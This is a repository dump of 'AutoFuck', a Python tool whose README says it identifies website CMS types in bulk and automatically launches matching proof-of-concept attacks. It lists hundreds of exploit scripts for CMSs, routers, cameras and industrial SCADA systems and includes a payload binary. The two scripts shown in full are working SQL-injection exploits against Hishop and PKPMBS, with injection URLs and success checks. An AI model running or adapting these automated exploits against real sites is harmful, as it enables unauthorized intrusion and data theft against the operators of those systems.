├── .gitignore
├── .history
├── AngelSword.py
├── CmsFind.py
├── README.md
├── __init__.py
├── autofuck.py
├── bin
└── goahead_payload.so
├── json
├── cms.json
├── cmspocdict.json
├── data.json
├── hardwarepocdict.json
├── industrialpocdict.json
├── informationpocdict.json
└── testcms.json
├── lib
├── __init__.py
├── gwhatweb.py
├── log.py
├── parser.py
└── spider.py
├── pocdb.py
├── pocs
├── __init__.py
├── cms
│ ├── Hishop
│ │ ├── __init__.py
│ │ └── hishop_productlist_sqli.py
│ ├── PKPMBS
│ │ ├── __init__.py
│ │ ├── pkpmbs_MsgList_sqli.py
│ │ ├── pkpmbs_addresslist_keyword_sqli.py
│ │ └── pkpmbs_guestbook_sqli.py
│ ├── __init__.py
│ ├── acsoft
│ │ ├── __init__.py
│ │ ├── acsoft_GetFileContent_fileread.py
│ │ ├── acsoft_GetFile_fileread.py
│ │ └── acsoft_GetXMLList_fileread.py
│ ├── autoset
│ │ ├── __init__.py
│ │ └── autoset_phpmyadmin_unauth.py
│ ├── cmseasy
│ │ ├── __init__.py
│ │ └── cmseasy_header_detail_sqli.py
│ ├── cmsmain.py
│ ├── dedecms
│ │ ├── __init__.py
│ │ ├── dedecms_download_redirect.py
│ │ ├── dedecms_error_trace_disclosure.py
│ │ ├── dedecms_recommend_sqli.py
│ │ ├── dedecms_search_typeArr_sqli.py
│ │ └── dedecms_version.py
│ ├── digital_campus
│ │ ├── __init__.py
│ │ ├── digital_campus_log_disclosure.py
│ │ └── digital_campus_systemcodelist_sqli.py
│ ├── discuz
│ │ ├── __init__.py
│ │ ├── discuz_focus_flashxss.py
│ │ ├── discuz_forum_message_ssrf.py
│ │ ├── discuz_plugin_ques_sqli.py
│ │ └── discuz_x25_path_disclosure.py
│ ├── diyou
│ │ ├── __init__.py
│ │ ├── dyp2p_latesindex_sqli.py
│ │ └── dyp2p_url_fileread.py
│ ├── dreamgallery
│ │ ├── __init__.py
│ │ └── dreamgallery_album_id_sqli.py
│ ├── dswjcms
│ │ ├── __init__.py
│ │ └── dswjcms_p2p_multi_sqli.py
│ ├── ecscms
│ │ ├── __init__.py
│ │ └── ecscms_MoreIndex_sqli.py
│ ├── ecshop
│ │ ├── __init__.py
│ │ ├── ecshop_flow_orderid_sqli.py
│ │ └── ecshop_uc_code_sqli.py
│ ├── esccms
│ │ ├── __init__.py
│ │ └── esccms_selectunitmember_unauth.py
│ ├── etmdcp
│ │ ├── __init__.py
│ │ └── etmdcp_Load_filedownload.py
│ ├── eyou
│ │ ├── __init__.py
│ │ ├── eyou_admin_id_sqli.py
│ │ ├── eyou_resetpw.py
│ │ ├── eyou_user_kw_sqli.py
│ │ └── eyou_weakpass.py
│ ├── fastmeeting
│ │ ├── __init__.py
│ │ └── fastmeeting_download_filedownload.py
│ ├── finecms
│ │ ├── __init__.py
│ │ └── finecms_uploadfile.py
│ ├── foosun
│ │ ├── __init__.py
│ │ └── foosun_City_ajax_sqli.py
│ ├── fsmcms
│ │ ├── __init__.py
│ │ ├── fsmcms_columninfo_sqli.py
│ │ ├── fsmcms_p_replydetail_sqli.py
│ │ └── fsmcms_setup_reinstall.py
│ ├── gobetters
│ │ ├── __init__.py
│ │ └── gobetters_multi_sqli.py
│ ├── gowinsoft_jw
│ │ ├── __init__.py
│ │ └── gowinsoft_jw_multi_sqli.py
│ ├── gpower
│ │ ├── __init__.py
│ │ └── gpower_users_disclosure.py
│ ├── hanweb
│ │ ├── __init__.py
│ │ ├── hanweb_VerifyCodeServlet_install.py
│ │ ├── hanweb_downfile_filedownload.py
│ │ └── hanweb_readxml_fileread.py
│ ├── iGenus
│ │ ├── __init__.py
│ │ ├── igenus_code_exec.py
│ │ ├── igenus_login_Lang_fileread.py
│ │ └── igenus_syslogin_Lang_fileread.py
│ ├── inspur
│ │ ├── __init__.py
│ │ ├── inspur_ecgap_displayNewsPic_sqli.py
│ │ └── inspur_multi_sqli.py
│ ├── iwms
│ │ ├── __init__.py
│ │ └── iwms_bypass_js_delete.py
│ ├── jeecg
│ │ ├── __init__.py
│ │ └── jeecg_pwd_reset.py
│ ├── jeecms
│ │ ├── __init__.py
│ │ └── jeecms_fpath_filedownload.py
│ ├── joomla
│ │ ├── __init__.py
│ │ ├── joomla_com_docman_lfi.py
│ │ └── joomla_index_list_sqli.py
│ ├── jumboecms
│ │ ├── __init__.py
│ │ └── jumboecms_slide_id_sqli.py
│ ├── kingdee
│ │ ├── __init__.py
│ │ ├── kingdee_conf_disclosure.py
│ │ ├── kingdee_filedownload.py
│ │ ├── kingdee_logoImgServlet_fileread.py
│ │ └── kingdee_resin_dir_path_disclosure.py
│ ├── kxmail
│ │ ├── __init__.py
│ │ └── kxmail_login_server_sqli.py
│ ├── lbcms
│ │ ├── __init__.py
│ │ └── lbcms_webwsfw_bssh_sqli.py
│ ├── libsys
│ │ ├── __init__.py
│ │ ├── libsys_ajax_asyn_link_fileread.py
│ │ ├── libsys_ajax_asyn_link_old_fileread.py
│ │ └── libsys_ajax_get_file_fileread.py
│ ├── live800
│ │ ├── __init__.py
│ │ ├── live800_downlog_filedownload.py
│ │ ├── live800_loginAction_sqli.py
│ │ ├── live800_services_xxe.py
│ │ └── live800_sta_export_sqli.py
│ ├── looyu
│ │ ├── __init__.py
│ │ └── looyu_down_filedownload.py
│ ├── metinfo
│ │ ├── __init__.py
│ │ ├── metinfo_getpassword_sqli.py
│ │ └── metinfo_login_check_sqli.py
│ ├── ndstar
│ │ ├── __init__.py
│ │ └── ndstar_six_sqli.py
│ ├── nitc
│ │ ├── __init__.py
│ │ ├── nitc_index_language_id_sqli.py
│ │ └── nitc_suggestwordList_sqli.py
│ ├── opensns
│ │ ├── __init__.py
│ │ ├── opensns_index_arearank.py
│ │ └── opensns_index_getshell.py
│ ├── others
│ │ ├── __init__.py
│ │ ├── alkawebs_viewnews_sqli.py
│ │ ├── anmai_grghjl_stuNo_sqli.py
│ │ ├── anmai_teachingtechnology_sqli.py
│ │ ├── caitong_multi_sleep_sqli.py
│ │ ├── caitong_multi_sqli.py
│ │ ├── cicro_DownLoad_filedownload.py
│ │ ├── clib_kindaction_fileread.py
│ │ ├── clib_kinweblistaction_download.py
│ │ ├── damall_selloffer_sqli.py
│ │ ├── dkcms_database_disclosure.py
│ │ ├── domino_unauth.py
│ │ ├── efuture_downloadAct_filedownload.py
│ │ ├── eis_menu_left_edit_sqli.py
│ │ ├── euse_study_multi_sqli.py
│ │ ├── gevercms_downLoadFile_filedownload.py
│ │ ├── gn_consulting_sqli.py
│ │ ├── gpcsoft_ewebeditor_weak.py
│ │ ├── gxwssb_fileDownloadmodel_download.py
│ │ ├── haohan_FileDown_filedownload.py
│ │ ├── hezhong_list_id_sqli.py
│ │ ├── hjsoft_sqli.py
│ │ ├── hnkj_researchinfo_dan_sqli.py
│ │ ├── hongan_dlp_struts_exec.py
│ │ ├── huaficms_bypass_js.py
│ │ ├── ips_community_suite_code_exec.py
│ │ ├── jiuyu_library_struts_exec.py
│ │ ├── jxt1039_unauth.py
│ │ ├── kj65n_monitor_sqli.py
│ │ ├── lianbang_multi_bypass_priv.py
│ │ ├── mainone_ProductList_sqli.py
│ │ ├── mainone_SupplyList_sqli.py
│ │ ├── mainone_b2b_Default_sqli.py
│ │ ├── mallbuilder_change_status_sqli.py
│ │ ├── mingteng_cookie_deception.py
│ │ ├── newedos_multi_sqli.py
│ │ ├── nongyou_Item2_sqli.py
│ │ ├── nongyou_ShowLand_sqli.py
│ │ ├── nongyou_multi_sqli.py
│ │ ├── nongyou_sleep_sqli.py
│ │ ├── rap_interface_struts_exec.py
│ │ ├── shiyou_list_keyWords_sqli.py
│ │ ├── sinda_downloadfile_download.py
│ │ ├── skytech_bypass_priv.py
│ │ ├── skytech_geren_list_page_sqli.py
│ │ ├── star_PostSuggestion_sqli.py
│ │ ├── suntown_upfile_fileupload.py
│ │ ├── tianbo_Class_Info_sqli.py
│ │ ├── tianbo_St_Info_sqli.py
│ │ ├── tianbo_TCH_list_sqli.py
│ │ ├── tianbo_Type_List_sqli.py
│ │ ├── tpshop_eval_stdin_code_exec.py
│ │ ├── workyi_multi_sqli.py
│ │ ├── xtcms_download_filedownload.py
│ │ ├── xuezi_ceping_unauth.py
│ │ ├── yaojie_steel_struts_exec.py
│ │ ├── yeu_disclosure_uid.py
│ │ ├── zf_cms_FileDownload.py
│ │ ├── zfcgxt_UserSecurityController_getpass.py
│ │ └── zhuofan_downLoadFile_download.py
│ ├── pageadmin
│ │ ├── __init__.py
│ │ └── pageadmin_forge_viewstate.py
│ ├── php168
│ │ ├── __init__.py
│ │ └── php168_login_getshell.py
│ ├── phpcms
│ │ ├── __init__.py
│ │ ├── phpcms_authkey_disclosure.py
│ │ ├── phpcms_digg_add_sqli.py
│ │ ├── phpcms_flash_upload_sqli.py
│ │ ├── phpcms_product_code_exec.py
│ │ ├── phpcms_v961_fileread.py
│ │ ├── phpcms_v96_sqli.py
│ │ └── phpcms_v9_flash_xss.py
│ ├── phpmyadmin
│ │ ├── __init__.py
│ │ └── phpmyadmin_setup_lfi.py
│ ├── phpok
│ │ ├── __init__.py
│ │ ├── phpok_api_param_sqli.py
│ │ ├── phpok_remote_image_getshell.py
│ │ └── phpok_res_action_control_filedownload.py
│ ├── phpstudy
│ │ ├── __init__.py
│ │ ├── phpstudy_phpmyadmin_defaultpwd.py
│ │ └── phpstudy_probe.py
│ ├── piaoyou
│ │ ├── __init__.py
│ │ ├── piaoyou_int_order_sqli.py
│ │ ├── piaoyou_multi_sqli.py
│ │ ├── piaoyou_newsview_list.py
│ │ ├── piaoyou_six2_sqli.py
│ │ ├── piaoyou_six_sqli.py
│ │ └── piaoyou_ten_sqli.py
│ ├── pstar
│ │ ├── __init__.py
│ │ ├── pstar_isfLclInfo_sqli.py
│ │ ├── pstar_qcustoms_sqli.py
│ │ └── pstar_warehouse_msg_01_sqli.py
│ ├── qibocms
│ │ ├── __init__.py
│ │ ├── qibocms_js_f_id_sqli.py
│ │ ├── qibocms_s_fids_sqli.py
│ │ ├── qibocms_search_code_exec.py
│ │ └── qibocms_search_sqli.py
│ ├── ruvar
│ │ ├── __init__.py
│ │ ├── ruvar_oa_multi_sqli.py
│ │ ├── ruvar_oa_multi_sqli2.py
│ │ └── ruvar_oa_multi_sqli3.py
│ ├── seacms
│ │ ├── __init__.py
│ │ ├── seacms_order_code_exec.py
│ │ ├── seacms_search_code_exec.py
│ │ └── seacms_search_jq_code_exec.py
│ ├── shadowsit
│ │ ├── __init__.py
│ │ └── shadowsit_selector_lfi.py
│ ├── shop360
│ │ ├── __init__.py
│ │ └── shop360_do_filedownload.py
│ ├── shop7z
│ │ ├── __init__.py
│ │ └── shop7z_order_checknoprint_sqli.py
│ ├── shopex
│ │ ├── __init__.py
│ │ └── shopex_phpinfo_disclosure.py
│ ├── shopnc
│ │ ├── __init__.py
│ │ └── shopnc_index_class_id_sqli.py
│ ├── shopnum
│ │ ├── __init__.py
│ │ ├── shopnum_GuidBuyList_sqli.py
│ │ ├── shopnum_ProductDetail_sqli.py
│ │ ├── shopnum_ProductListCategory_sqli.py
│ │ └── shopnum_ShoppingCart1_sqli.py
│ ├── siteengine
│ │ ├── __init__.py
│ │ └── siteengine_comments_module_sqli.py
│ ├── siteserver
│ │ ├── __init__.py
│ │ ├── siteserver_UserNameCollection_sqli.py
│ │ ├── siteserver_background_administrator_sqli.py
│ │ ├── siteserver_background_keywordsFilting_sqli.py
│ │ ├── siteserver_background_log_sqli.py
│ │ └── siteserver_background_taskLog_sqli.py
│ ├── smartoa
│ │ ├── __init__.py
│ │ └── smartoa_multi_filedownload.py
│ ├── speedcms
│ │ ├── __init__.py
│ │ └── speedcms_list_cid_sqli.py
│ ├── tcexam
│ │ ├── __init__.py
│ │ └── tcexam_reinstall_getshell.py
│ ├── thinkphp
│ │ ├── __init__.py
│ │ ├── onethink_category_sqli.py
│ │ └── thinkphp_code_exec.py
│ ├── thinksns
│ │ ├── __init__.py
│ │ └── thinksns_category_code_exec.py
│ ├── trs
│ │ ├── __init__.py
│ │ ├── trs_ids_auth_disclosure.py
│ │ ├── trs_infogate_register.py
│ │ ├── trs_infogate_xxe.py
│ │ ├── trs_inforadar_disclosure.py
│ │ ├── trs_lunwen_papercon_sqli.py
│ │ ├── trs_was40_passwd_disclosure.py
│ │ ├── trs_was40_tree_disclosure.py
│ │ ├── trs_was5_config_disclosure.py
│ │ ├── trs_was5_download_templet.py
│ │ ├── trs_wcm_default_user.py
│ │ ├── trs_wcm_infoview_disclosure.py
│ │ ├── trs_wcm_pre_as_lfi.py
│ │ └── trs_wcm_service_writefile.py
│ ├── typecho
│ │ ├── __init__.py
│ │ └── typecho_install_code_exec.py
│ ├── umail
│ │ ├── __init__.py
│ │ ├── umail_physical_path.py
│ │ └── umail_sessionid_access.py
│ ├── uniportal
│ │ ├── __init__.py
│ │ └── uniportal_bypass_priv_sqli.py
│ ├── urp
│ │ ├── __init__.py
│ │ ├── urp_ReadJavaScriptServlet_fileread.py
│ │ ├── urp_query.py
│ │ └── urp_query2.py
│ ├── v2tech
│ │ ├── __init__.py
│ │ └── v2Conference_sqli_xxe.py
│ ├── viewgood
│ │ ├── __init__.py
│ │ ├── viewgood_GetCaption_sqli.py
│ │ ├── viewgood_pic_proxy_sqli.py
│ │ └── viewgood_two_sqli.py
│ ├── weaver_oa
│ │ ├── __init__.py
│ │ ├── weaver_oa_db_disclosure.py
│ │ ├── weaver_oa_download_sqli.py
│ │ └── weaver_oa_filedownload.py
│ ├── wecenter
│ │ ├── __init__.py
│ │ └── wecenter_topic_id_sqli.py
│ ├── weway
│ │ ├── __init__.py
│ │ └── weway_PictureView1_filedownload.py
│ ├── wizbank
│ │ ├── __init__.py
│ │ ├── wizbank_download_filedownload.py
│ │ └── wizbank_usr_id_sqli.py
│ ├── wordpress
│ │ ├── __init__.py
│ │ ├── wordpress_admin_ajax_filedownload.py
│ │ ├── wordpress_display_widgets_backdoor.py
│ │ ├── wordpress_plugin_ShortCode_lfi.py
│ │ ├── wordpress_plugin_azonpop_sqli.py
│ │ ├── wordpress_plugin_mailpress_rce.py
│ │ ├── wordpress_restapi_sqli.py
│ │ ├── wordpress_url_redirect.py
│ │ └── wordpress_woocommerce_code_exec.py
│ ├── xplus
│ │ ├── __init__.py
│ │ ├── xplus_2003_getshell.py
│ │ └── xplus_mysql_mssql_sqli.py
│ ├── yonyou
│ │ ├── __init__.py
│ │ ├── yonyou_a8_CmxUser_sqli.py
│ │ ├── yonyou_a8_logs_disclosure.py
│ │ ├── yonyou_a8_personService_xxe.py
│ │ ├── yonyou_cm_info_content_sqli.py
│ │ ├── yonyou_createMysql_disclosure.py
│ │ ├── yonyou_ehr_ELTextFile.py
│ │ ├── yonyou_ehr_resetpwd_sqli.py
│ │ ├── yonyou_fe_treeXml_sqli.py
│ │ ├── yonyou_getemaildata_fileread.py
│ │ ├── yonyou_icc_struts2.py
│ │ ├── yonyou_initData_disclosure.py
│ │ ├── yonyou_multi_union_sqli.py
│ │ ├── yonyou_nc_NCFindWeb_fileread.py
│ │ ├── yonyou_status_default_pwd.py
│ │ ├── yonyou_test_sqli.py
│ │ ├── yonyou_u8_CmxItem_sqli.py
│ │ └── yonyou_user_ids_sqli.py
│ ├── zfsoft
│ │ ├── __init__.py
│ │ ├── xml
│ │ │ ├── zfsoft_service_stryhm_sqli_false.xml
│ │ │ └── zfsoft_service_stryhm_sqli_true.xml
│ │ ├── zfsoft_database_control.py
│ │ ├── zfsoft_default3_bruteforce.py
│ │ └── zfsoft_service_stryhm_sqli.py
│ └── zuitu
│ │ ├── __init__.py
│ │ └── zuitu_coupon_id_sqli.py
├── hardware
│ ├── __init__.py
│ ├── camera
│ │ ├── __init__.py
│ │ ├── camera_hikvision_web_weak.py
│ │ └── camera_uniview_dvr_rce.py
│ ├── firewall
│ │ ├── __init__.py
│ │ └── juniper_netscreen_backdoor.py
│ ├── gateway
│ │ ├── __init__.py
│ │ ├── adtsec_Overall_app_js_bypass.py
│ │ ├── adtsec_gateway_struts_exec.py
│ │ ├── mpsec_weakpass_exec.py
│ │ └── mpsec_webui_filedownload.py
│ ├── hardwaremain.py
│ ├── printer
│ │ ├── __init__.py
│ │ ├── printer_canon_unauth.py
│ │ ├── printer_hp_jetdirect_unauth.py
│ │ ├── printer_topaccess_unauth.py
│ │ └── printer_xerox_default_pwd.py
│ └── router
│ │ ├── __init__.py
│ │ ├── router_dlink_command_exec.py
│ │ ├── router_dlink_webproc_fileread.py
│ │ └── router_ruijie_unauth.py
├── industrial
│ ├── __init__.py
│ ├── dfe_scada_conf_disclosure.py
│ ├── industrialmain.py
│ ├── rockontrol_weak.py
│ ├── sgc8000_defaultuser_disclosure.py
│ ├── sgc8000_deldata_config_disclosure.py
│ ├── sgc8000_sg8k_sms_disclosure.py
│ ├── wireless_monitor_priv_elevation.py
│ ├── zte_wireless_getChannelByCountryCode_sqli.py
│ └── zte_wireless_weak_pass.py
├── information
│ ├── __init__.py
│ ├── apache_server_status_disclosure.py
│ ├── crossdomain_find.py
│ ├── git_check.py
│ ├── informationmain.py
│ ├── jetbrains_ide_workspace_disclosure.py
│ ├── jsp_conf_find.py
│ ├── options_method.py
│ ├── robots_find.py
│ ├── springboot_api.py
│ └── svn_check.py
└── system
│ ├── __init__.py
│ ├── bash
│ ├── __init__.py
│ └── shellshock.py
│ ├── couchdb
│ ├── __init__.py
│ └── couchdb_unauth.py
│ ├── dorado
│ ├── __init__.py
│ └── dorado_default_passwd.py
│ ├── glassfish
│ ├── __init__.py
│ └── glassfish_fileread.py
│ ├── goahead
│ ├── __init__.py
│ ├── bin
│ │ └── goahead_payload.so
│ └── goahead_LD_PRELOAD_rce.py
│ ├── hfs
│ ├── __init__.py
│ └── hfs_rejetto_search_rce.py
│ ├── hudson
│ ├── __init__.py
│ └── hudson_ws_disclosure.py
│ ├── iis
│ ├── __init__.py
│ ├── iis_ms15034_httpsys_rce.py
│ └── iis_webdav_rce.py
│ ├── intel
│ ├── __init__.py
│ └── intel_amt_crypt_bypass.py
│ ├── kinggate
│ ├── __init__.py
│ └── kinggate_zebra_conf.py
│ ├── mongodb
│ ├── __init__.py
│ └── mongodb_unauth.py
│ ├── nginx
│ ├── __init__.py
│ └── multi_fastcgi_code_exec.py
│ ├── others
│ ├── __init__.py
│ ├── forease_fileinclude_code_exec.py
│ └── moxa_oncell_telnet.py
│ ├── php
│ ├── __init__.py
│ ├── php_expose_disclosure.py
│ └── php_fastcgi_read.py
│ ├── redis
│ ├── __init__.py
│ └── redis_unauth.py
│ ├── resin
│ ├── __init__.py
│ └── resin_viewfile_fileread.py
│ ├── sangfor
│ ├── __init__.py
│ └── sangfor_ad_script_command_exec.py
│ ├── smtp
│ ├── __init__.py
│ └── smtp_starttls_plaintext_inj.py
│ ├── srun
│ ├── __init__.py
│ ├── srun_download_file_filedownload.py
│ ├── srun_index_file_filedownload.py
│ ├── srun_rad_online_bypass_rce.py
│ ├── srun_rad_online_username_rce.py
│ └── srun_user_info_uid_rce.py
│ ├── ssl
│ ├── __init__.py
│ └── openssl_heartbleed.py
│ ├── systemmain.py
│ ├── tomcat
│ ├── __init__.py
│ ├── tomcat_put_exec.py
│ └── tomcat_weak_pass.py
│ ├── topsec
│ ├── __init__.py
│ └── topsec_change_lan_filedownload.py
│ ├── turbomail
│ ├── __init__.py
│ ├── turbogate_services_xxe.py
│ └── turbomail_conf.py
│ ├── vhost
│ ├── __init__.py
│ ├── hac_gateway_info_disclosure.py
│ ├── npoint_mdb_download.py
│ └── zkeys_database_conf.py
│ ├── weblogic
│ ├── __init__.py
│ ├── weblogic_interface_disclosure.py
│ ├── weblogic_ssrf.py
│ ├── weblogic_weak_pass.py
│ └── weblogic_xmldecoder_exec.py
│ ├── zabbix
│ ├── __init__.py
│ └── zabbix_jsrpc_profileIdx2_sqli.py
│ └── zookeeper
│ ├── __init__.py
│ └── zookeeper_unauth.py
├── requirements.txt
├── scan
├── __init__.py
├── arbitrarily_filefuzz_check.py
└── xss_characterfuzz_check.py
├── systempocdict.json
├── target.txt
└── xml
├── zfsoft_service_stryhm_sqli_false.xml
└── zfsoft_service_stryhm_sqli_true.xml
/.gitignore:
--------------------------------------------------------------------------------
1 | *.pyc
2 | __pycache__/
3 | .idea/
4 |
--------------------------------------------------------------------------------
/.history:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/.history
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AutoFuck
2 | AutoFuck是由AngelSword项目的poc拿过来重写的一个新项目, 可以批量识别网站cms类型,并且加载相关poc自动攻击。
3 | 嗯, 为什么没有人真正写一点有用的东西呢?
4 |
5 | 还在开发,各位. 请等待.
6 |
7 |
8 | # 使用用法
9 | 
10 |
11 |
12 |
13 | # 平台
14 | MAC Linux + python3
15 |
16 |
17 | # 需要用到的模块
18 | bs4
19 | json
20 | redis
21 | urllib
22 | pexpect
23 | termcolor
24 | hashlib
25 | telnetlib
26 | pymysql
27 | pymongo
28 |
29 |
30 | # 说明
31 | 1.部分代码参考网上公开的脚本。
32 |
33 | 2.本工具仅限于进行漏洞验证,如若因此引起相关法律问题,概不负责。
34 |
35 | 3.所有POC均为开源,以后也一直如此,供大家参考和学习。如果有提供POC的朋友可以私发👇👇邮箱。
36 |
37 |
38 |
39 | # bugs
40 | hacktext@163.com
41 |
42 |
--------------------------------------------------------------------------------
/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*- #
3 | __author__ = 'fengxuan'
--------------------------------------------------------------------------------
/bin/goahead_payload.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/bin/goahead_payload.so
--------------------------------------------------------------------------------
/json/industrialpocdict.json:
--------------------------------------------------------------------------------
1 | [{"method": "dfe_scada_conf_disclosure_BaseVerify", "description": "\u4e1c\u65b9\u7535\u5b50SCADA\u901a\u7528\u7cfb\u7edf\u4fe1\u606f\u6cc4\u9732"}, {"method": "zte_wireless_getChannelByCountryCode_sqli_BaseVerify", "description": "zte \u65e0\u7ebf\u63a7\u5236\u5668 SQL\u6ce8\u5165"}, {"method": "rockontrol_weak_BaseVerify", "description": "\u706b\u529b\u53d1\u7535\u80fd\u8017\u76d1\u6d4b\u5f31\u53e3\u4ee4"}, {"method": "sgc8000_defaultuser_disclosure_BaseVerify", "description": "sgc8000\u76d1\u63a7\u7cfb\u7edf\u8d85\u7ba1\u8d26\u53f7\u6cc4\u9732\u6f0f\u6d1e"}, {"method": "sgc8000_deldata_config_disclosure_BaseVerify", "description": "sgc8000 \u76d1\u63a7\u7cfb\u7edf\u6570\u636e\u8fde\u63a5\u4fe1\u606f\u6cc4\u9732"}, {"method": "sgc8000_sg8k_sms_disclosure_BaseVerify", "description": "sgc8000 \u5927\u578b\u65cb\u8f6c\u673a\u76d1\u63a7\u7cfb\u7edf\u62a5\u8b66\u77ed\u4fe1\u6a21\u5757\u6cc4\u9732"}, {"method": "zte_wireless_weak_pass_BaseVerify", "description": "\u4e2d\u5174\u65e0\u7ebf\u63a7\u5236\u5668\u5f31\u53e3\u4ee4"}, {"method": "wireless_monitor_priv_elevation_BaseVerify", "description": "\u65b0\u529b\u70ed\u7535\u65e0\u7ebf\u6284\u8868\u76d1\u63a7\u7cfb\u7edf\u7ed5\u8fc7\u540e\u53f0\u767b\u5f55"}]
--------------------------------------------------------------------------------
/json/informationpocdict.json:
--------------------------------------------------------------------------------
1 | [{"method": "svn_check_BaseVerify", "description": "svn\u6e90\u7801\u6cc4\u9732\u626b\u63cf"}, {"method": "robots_find_BaseVerify", "description": "robots\u6587\u4ef6\u53d1\u73b0"}, {"method": "options_method_BaseVerify", "description": "options\u65b9\u6cd5\u5f00\u542f"}, {"method": "jsp_conf_find_BaseVerify", "description": "java\u914d\u7f6e\u6587\u4ef6\u6587\u4ef6\u53d1\u73b0"}, {"method": "git_check_BaseVerify", "description": "git\u6e90\u7801\u6cc4\u9732\u626b\u63cf"}, {"method": "apache_server_status_disclosure_BaseVerify", "description": "apache server-status\u4fe1\u606f\u6cc4\u9732"}, {"method": "springboot_api_BaseVerify", "description": "spring boot \u8def\u5f84\u6cc4\u9732"}, {"method": "jetbrains_ide_workspace_disclosure_BaseVerify", "description": "JetBrains IDE workspace.xml\u6587\u4ef6\u6cc4\u9732"}, {"method": "crossdomain_find_BaseVerify", "description": "crossdomain.xml\u6587\u4ef6\u53d1\u73b0"}]
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*- #
3 | __author__ = 'fengxuan'
--------------------------------------------------------------------------------
/lib/log.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*- #
3 | __author__ = 'fengxuan'
4 |
5 | import logging
6 |
7 | logging.basicConfig(level=logging.INFO,
8 | format='[%(asctime)s] %(message)s',
9 | datefmt='%Y:%m:%d %H:%M:%S')
10 | logger = logging.getLogger('running')
--------------------------------------------------------------------------------
/lib/parser.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*- #
3 | __author__ = 'fengxuan'
4 |
5 | import hashlib
6 | import re
7 | from .log import logger
8 |
9 |
10 |
11 | def _GetMd5(body):
12 | m2 = hashlib.md5()
13 | m2.update(body)
14 | return m2.hexdigest()
15 |
16 |
17 | def checkcms(req_obj, rule):
18 | '''
19 | {"ruletype": "code", "rule": 200, "weight":75}
20 | :return:
21 | '''
22 | # if self.rule['d']
23 | method = rule['method']
24 | weight = 0
25 |
26 | if method == 're':
27 | regu_cont=re.compile(rule['value'], re.I)
28 | res=regu_cont.match(req_obj.text)
29 | if res:
30 | weight = rule['weight']
31 | elif method == 'md5':
32 | md5 = _GetMd5(req_obj.text)
33 | if md5 == rule['value']:
34 | weight = rule['weight']
35 | elif method == 'code':
36 | code = req_obj.status_code
37 | if code == rule['value']:
38 | weight = rule['weight']
39 |
40 | return weight
41 |
--------------------------------------------------------------------------------
/pocs/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*- #
3 | __author__ = 'fengxuan'
--------------------------------------------------------------------------------
/pocs/cms/Hishop/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/Hishop/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/Hishop/hishop_productlist_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: Hishop系统productlist.aspx SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0154499
6 | author: Lucifer
7 | description: Hishop易分销系统/wapshop/productlist.aspx文件中参数sort存在注入
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class hishop_productlist_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/wapshop/productlist.aspx?sort=char(sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27)))"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
25 | cprint("[+]存在Hishop SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = hishop_productlist_sqli_BaseVerify(sys.argv[1])
33 | testVuln.run()
34 |
--------------------------------------------------------------------------------
/pocs/cms/PKPMBS/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/PKPMBS/__init__.py
--------------------------------------------------------------------------------
/pocs/cms/PKPMBS/pkpmbs_guestbook_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding: utf-8 -*-
3 | '''
4 | name: PKPMBS工程质量监督站信息管理系统SQL注入
5 | referer: http://www.wooyun.org/bugs/wooyun-2015-0154499
6 | author: Lucifer
7 | description: PKPMBS guestbook.aspx文件中参数id存在SQL注入漏洞
8 | '''
9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 |
14 | class pkpmbs_guestbook_sqli_BaseVerify:
15 | def __init__(self, url):
16 | self.url = url
17 |
18 | def run(self):
19 | payload = "/guestbook.aspx?do=show&id=1%20union%20all%20select%20null,null,null,null,null,null,null,null,null,null,null,sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--"
20 | vulnurl = self.url + payload
21 | try:
22 | req = requests.get(vulnurl, timeout=10, verify=False)
23 |
24 | if r"81dc9bdb52d04dc20036dbd8313ed055" in req.text:
25 | cprint("[+]存在PKPMBS SQL注入漏洞...(高危)\tpayload: "+vulnurl, "red")
26 |
27 | except:
28 | cprint("[-] "+__file__+"====>连接超时", "cyan")
29 |
30 | if __name__ == "__main__":
31 | warnings.filterwarnings("ignore")
32 | testVuln = pkpmbs_guestbook_sqli_BaseVerify(sys.argv[1])
33 | testVuln.run()
--------------------------------------------------------------------------------
/pocs/cms/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/harry1080/AutoFuck/8ee8eea3266ae18ad539ec432338641c2f8b0106/pocs/cms/__init__.py
--------------------------------------------------------------------------------
